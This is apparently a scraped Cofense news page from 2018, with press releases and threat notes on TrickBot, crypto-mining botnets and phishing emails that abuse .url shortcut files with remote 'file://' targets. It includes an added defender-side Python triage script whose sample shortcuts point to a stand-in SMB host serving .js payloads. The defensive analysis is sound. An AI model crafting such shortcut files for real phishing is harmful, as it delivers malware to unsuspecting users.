Cofense Pioneers New Phishing Simulation Certification Program for Security Awareness Professionals

Global leader in phishing defense unveils the first-and-only industry certification for phishing simulation programs

LEESBURG, VA – March 29, 2018 – Cofense™, the leading provider of human-driven phishing defense solutions worldwide, today introduced Cofense PhishMe™ Certification for professionals who administer phishing simulation programs to safeguard their organizations against email-based attacks. Cofense created the phishing simulation industry by launching its Cofense PhishMe solution in 2008. The company continues to pioneer in this market segment by unveiling the first and only phishing simulation certification program of its kind.

Become the First Security Awareness Professional to be Fully Certified in Phishing Simulation Programs with Cofense

Want to boost your anti-phishing and your professional creds? Now you can, in just a few hours and on your own schedule.

Cofense™ is pleased to announce the Cofense PhishMe™ certification, the industry’s first and only professional certification for phishing simulation programs. It’s your chance to fully master Cofense PhishMe, our award-winning phishing awareness training solution, while becoming a certified expert in phishing simulation programs.

As Mobile Email Access Increases, Cofense™ Introduces Mobile Device Reporting as Its Latest Innovation in the Fight Against Phishing Threats

Cofense continues to improve its ability to condition employees to recognize phishing attacks and to report them from anywhere

LEESBURG, VA. – March 28, 2018 – Cofense™, the leading provider of human-driven phishing defense solutions worldwide, today announced product feature innovations to Cofense PhishMe™ and Cofense Reporter™ to better fight the escalating threat of phishing attacks.

Analysing TrickBot Doesn’t Have to be Tricky

New additions to the TrickBot malware’s capabilities, observed by the Phishing Defence Centre, indicate that this malware tool is undergoing active development. The designers of this malware are still working hard to introduce new functionality, including network worm functionality and a screen-lock module. The worm component utilises the leaked “EternalBlue” exploit for CVE-2017-0144 to propagate itself across networks that have yet to patch or discontinue the use of SMBv1. The deployment of the screen-lock module (which appears to be still in the early phases of development) gives the threat actors the ability to change the malware from a robust banking trojan into rudimentary ransomware.

Over half of European companies unprepared for email-based cyberattacks

Research shows that European companies receive more suspicious emails than their US counterparts

London, UK – March 27, 2018 – Today Cofense™, the leading provider of human-driven phishing defence solutions worldwide, announced the results of its Europe-wide Phishing Response Trends Report, which looked at the phishing response strategies of IT security decision-makers across a variety of industries throughout Europe. The report found that 45 percent of European countries are not prepared for a phishing attack, despite 78 percent of IT professionals having dealt with a security incident originating from a deceptive email. This was significantly lower than the 66 percent in the US that had dealt with a similar incident.

Gamers, beware. You are a target for crypto-mining botnets.

Many gamers are unaware that they are potential targets for mining botnets, or that they may already be mining cryptocurrencies for cybercriminals.

Why are gamers targets? Think about it. Mining requires a large graphics card (GPU), a dedicated Internet connection and an uninterrupted power source. Gamers use powerful, high-performing GPUs to stay online and play networked games without interruption. It’s the perfect recipe for crypto mining.

The Latest in Software Functionality Abuse: URL Internet Shortcut Files Abused to Deliver Malware

Adding to a growing trend of phishing attacks wherein Windows and Office functionalities are abused to compromise victim systems, Cofense Intelligence™ has analyzed a recent campaign that uses the URL file type to deliver subsequent malware payloads. This file type is similar to a Windows LNK shortcut file (both file types share the same global object identifier within Windows) and can be used as a shortcut to online locations or network file shares. These files may abuse built-in functionality in Windows to enhance the ability of an attacker to deliver malware to endpoints.

By abusing these built-in functionalities, threat actors can complicate detection and mitigation in these scenarios, because the software is behaving exactly as it was designed to. The proliferation of abuse techniques indicates that threat actors may be increasingly prioritizing the use of such methodologies due to detection difficulties.

The emails analyzed by Cofense Intelligence include a nondescript phishing campaign that informs recipients of an attached bill, receipt, or invoice. The analysis performed for Threat ID 10993 focused on emails that deliver attached URL shortcut files with their target resource identified using the “file://” scheme. Windows environments use this scheme to denote a file resource that is on the hard drive or hosted on a network file share.

However, the target for these Uniform Resource Identifiers (URIs) can also be a remote resource. When a URL shortcut file is written to disk, Windows will attempt to validate the target denoted by the “file://” scheme. If validated, the remote resource can be downloaded to the local machine. The use of this file format and URI scheme may indicate that threat actors seek to abuse the resource resolution functionality associated with these shortcut files to deliver malware onto victims’ machines at the time the URL file is extracted from a Zip archive.
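As an added example (not Cofense’s code or the campaign’s files), a defender-side triage script that parses extracted .url attachments and flags any whose target uses the “file://” scheme with a remote host, the resolution behaviour described above. The sample shortcut contents and the 203.0.113.10 address are constructed.

```python
import configparser
from urllib.parse import urlparse

# Constructed sample .url attachments (not the campaign's files). A Windows
# Internet Shortcut is INI text: an [InternetShortcut] section with a URL= key.
SAMPLES = {
    "invoice.url": "[InternetShortcut]\r\nURL=file://203.0.113.10/share/invoice.js\r\n",
    "bill.url": "[InternetShortcut]\r\nURL=file:\\\\203.0.113.10\\share\\bill.js\r\n",
    "readme.url": "[InternetShortcut]\r\nURL=file:///C:/Users/Public/readme.txt\r\n",
    "portal.url": "[InternetShortcut]\r\nURL=https://example.com/portal\r\nIconIndex=0\r\n",
    "broken.url": "not a shortcut at all\r\n",
}

LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}

def shortcut_target(text):
    """Return the URL= value of a .url file, or None if it is not a shortcut."""
    cp = configparser.ConfigParser(interpolation=None)
    try:
        cp.read_string(text)
    except configparser.Error:
        return None
    # ConfigParser lowercases option names, so URL= is looked up as "url".
    return cp.get("InternetShortcut", "url", fallback=None)

def classify_target(url):
    """Split a shortcut target into scheme/host and decide whether it is a remote share."""
    normalized = url.replace("\\", "/")  # file:\\host\share -> file://host/share
    parsed = urlparse(normalized)
    scheme, host, path = parsed.scheme.lower(), parsed.netloc.lower(), parsed.path
    if scheme == "file" and not host and path.startswith("//"):
        host = path.split("/")[2].lower()  # file:////host/share form
    remote = scheme == "file" and host not in LOCAL_HOSTS
    return {"scheme": scheme, "host": host, "remote_file_share": remote}

def triage(files):
    """Map each attachment name to a verdict a responder can act on."""
    verdicts = {}
    for name, text in files.items():
        target = shortcut_target(text)
        if target is None:
            verdicts[name] = "not-a-shortcut"
            continue
        info = classify_target(target)
        if info["remote_file_share"]:
            verdicts[name] = "ALERT remote file:// target " + info["host"]
        elif info["scheme"] == "file":
            verdicts[name] = "local file:// target"
        else:
            verdicts[name] = info["scheme"] + " target"
    return verdicts

if __name__ == "__main__":
    for name, verdict in triage(SAMPLES).items():
        print(f"{name:12} {verdict}")
```

Run it over the contents of every .url extracted from a quarantined Zip; a remote “file://” target is the signal that Windows may reach out to an SMB share as soon as the shortcut is written to disk.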

Figure 1 – URL shortcut files can reference remote file shares to deliver malware

During our analysis, there was no evidence that the downloaded JavaScript application can be run without user interaction. However, once the script application is executed, the infection process continues with the subsequent download and execution of the Quant Loader malware downloader. Quant Loader, in turn, runs a sample of the Ammyy Admin remote desktop administration software that is being repurposed as an effective remote access trojan by these attackers.

Figure 2 – Downloading a payload over SMB is a less-common method for malware delivery

This technique showcases yet another method in which commonplace Windows features are abused by threat actors, adding to the expanding set of delivery applications crafted to distribute malware.

The nature of these files reveals the risk involved with applications that obtain files simply by issuing connection requests without user interaction. Incident responders and network defenders must devise a response plan to address this scenario, especially if enterprises and organizations operate on a Windows environment. This campaign also demonstrates that as threat actors develop new attack methodologies, more emails are likely to reach user inboxes. Therefore, it is crucial that those users can identify and report such campaigns, because they are the final line of defense at that point.
